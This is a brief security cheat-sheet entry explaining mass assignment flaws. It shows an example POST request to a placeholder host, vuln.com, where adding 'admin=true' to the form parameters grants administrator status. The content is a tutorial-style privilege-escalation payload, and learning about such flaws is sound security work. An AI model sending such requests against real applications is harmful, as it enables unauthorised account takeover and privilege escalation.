# Mass Assignment Attack

## Introduction
Occurs when an app allows a user to manually add parameters in an HTTP Request & the app process value of these parameters when processing the HTTP Request & it affects the response that is returned to the user. Usually occurs in Ruby on Rails / NodeJS

## How to exploit
- Normal request
```
POST /editdata
Host: vuln.com

username=daffa
```
```
HTTP/1.1 200 OK
...

username=daffa&admin=false
```

- Modified Request 
```
POST /editdata
Host: vuln.com

username=daffa&admin=true
```

```
HTTP/1.1 200 OK
...

username=daffa&admin=true
```

## References
* [Pentester Academy](https://blog.pentesteracademy.com/hunting-for-mass-assignment-56ed73095eda)